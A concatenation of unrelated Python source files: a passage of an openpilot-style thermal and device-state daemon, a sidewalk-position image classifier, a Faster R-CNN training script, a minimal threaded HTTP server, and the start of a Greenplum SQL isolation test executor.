PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
prebuiltfile = '/data/openpilot/prebuilt'
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
restart_triggered_ts = 0.
panda_state_ts = 0.
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot()
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot()
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
else:
if sec_since_boot() - panda_state_ts > 3.:
if onroad_conditions["ignition"]:
cloudlog.error("Lost panda connection while onroad")
onroad_conditions["ignition"] = False
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
prebuiltlet = params.get_bool("PutPrebuilt")
if not os.path.isfile(prebuiltfile) and prebuiltlet:
os.system("cd /data/openpilot; touch prebuilt")
elif os.path.isfile(prebuiltfile) and not prebuiltlet:
os.system("cd /data/openpilot; rm -f prebuilt")
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
shift_classification.py
|
import cv2
import threading
import tensorflow as tf
import numpy as np
import capturer
from utils.circularBuffer import CircularBuffer
classes = ['Left of Sidewalk', 'Middle of Sidewalk', 'Right of Sidewalk', 'Nothing Detected']
model_path = "./shift_classification/shift_classification_model_vgg16_final.h5"
readings_buffer_size = 50
image_preprocessing_dimens = (100, 100)
detection_threshold = 0.5
class SidewalkClassification:
def __init__(self):
self.model = tf.keras.models.load_model(model_path)
self.readings_buffer = CircularBuffer(readings_buffer_size, noneOverridePercent=0.5)
self.images_queue = CircularBuffer(1)
self.classifier_queue = CircularBuffer(1)
threading.Thread(target=self.classification_starter).start()
def capture_processing(self):
while True:
try:
frame = capturer.get_images().get_last()
if frame is not None:
preprocessed_frame = cv2.resize(frame, image_preprocessing_dimens, interpolation=cv2.INTER_LINEAR)
self.images_queue.add(np.expand_dims(preprocessed_frame, 0))
except Exception as e:
print("Capturing Not Working", e)
def classification_starter(self):
threading.Thread(target=self.capture_processing).start()
while True:
try:
self.perform_inference(self.images_queue.get_last())
except Exception as e:
print("Classification Not Working", e)
def perform_inference(self, image):
feedforward_result = self.model.predict(image).tolist()[0]
self.readings_buffer.add(None if feedforward_result == None or max(feedforward_result) < detection_threshold else feedforward_result)
averaged_result = self.readings_buffer.mean()
self.classifier_queue.add(classes[len(classes) - 1] if averaged_result is None else classes[np.argmax(averaged_result)])
def get_inference(self):
return self.classifier_queue.get_last()
|
train_pascal.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'dense33net'
#d = 'pascal_voc'
# Solver for each training stage
solvers = [[net_name, n, 'solver.prototxt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [500000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'test_densenet.prototxt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
if cfg.GPU_ID < 0:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
|
router.py
|
#!/usr/bin/env python3
"""
Basic HTTP server (main driver).
Processes all incoming and outgoing HTTP Requests/Responses
Creates a new thread for every request and handles it
Calls appropriate RequestParser.py and Responder.py objects
"""
import socket
import threading
import sys, os
from RequestParser import RequestParser
from Responder import Responder
class Server():
def __init__(self, ip, port):
"""Initializes our server and binds to a socket."""
self.host = ip
self.port = port
self.sock = socket.socket()
# setsockopt allows for more flexible socket binding
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
print("Bounded on {}:{}".format(self.host, self.port))
def listen(self):
"""Listens for incoming connections and threads them off."""
self.sock.listen(5) # queue up to 5 clients
# server runs infinitely and threads off each incoming connection
while True:
client, address = self.sock.accept()
client.settimeout(30) # times out if client inactive for 30 seconds
threading.Thread(target = self.serveClient, args = (client,address)).start()
def recvall(self, client):
"""A helper function to receive ALL client data before proceeding."""
BUFF_SIZE = 512
data = b''
while True:
part = client.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# either 0 or end of data
break
return data
def serveClient(self, client, address):
"""Receives request, parses it, responds, and closes connection."""
name = "{}:{}".format(address[0], address[1])
print("Connected to", name)
while True:
try:
data = self.recvall(client)
if data:
request = RequestParser(data) # initialize RequestParser object
request.parseRequest() # parse the request
response = Responder(request, client, name)
# call the appropriate Responder function based on status code
if request.error_code != 200:
response.sendError(request.error_code)
elif request.action == 'GET':
response.sendGET()
elif request.action == 'POST':
response.sendPOST()
# close the connection once the client has been served
# and exit the thread
print('Served {}, disconnecting.'.format(name))
client.close()
return False
else:
raise Exception('Client {} disconnected'.format(name))
except Exception as e:
print(e)
client.close()
return False # need to return to safely exit the thread
if __name__ == "__main__":
ip = '127.0.0.1' # localhost
port = 8888 # our default port
server = Server(ip, port)
server.listen()
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
import pygresql.pg
from tinctest.lib import Gpdiff
import os
import subprocess
import re
import multiprocessing
import time
import sys
import socket
import tinctest
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(\d+)([&\\<\\>Uq]?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, self.out_file.name, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.2)
if self.pipe.poll(0):
raise Exception("Forked command is not blocking")
self.has_open = True
def join(self):
print >>self.out_file, " <... completed>"
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, output_file, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = pygresql.pg.connect(host=hostname,
port=port,
opt="-c gp_session_role=utility",
dbname=self.dbname)
else:
self.con = pygresql.pg.connect(dbname=self.dbname)
self.filename = "%s.%s" % (output_file, os.getpid())
def get_utility_mode_port(self, name):
"""
Gets the port number/hostname combination of the
dbid with the id = name
"""
con = pygresql.pg.connect(port = int(os.environ.get("PGPORT", 5432)))
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE dbid = %s" % name).getresult()
if len(r) == 0:
raise Exception("Invalid dbid %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
This is a pretty dirty, but apprently the only way
to get the pretty output of the query result.
The reason is that for some python internal reason
print(r) calls the correct function while neighter str(r)
nor repr(r) output something useful.
"""
with open(self.filename, "w") as f:
print >>f, r,
f.flush()
with open(self.filename, "r") as f:
ppr = f.read()
return ppr.strip() + "\n"
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, self.printout_result(r))
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
if os.path.exists(self.filename):
os.unlink(self.filename)
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
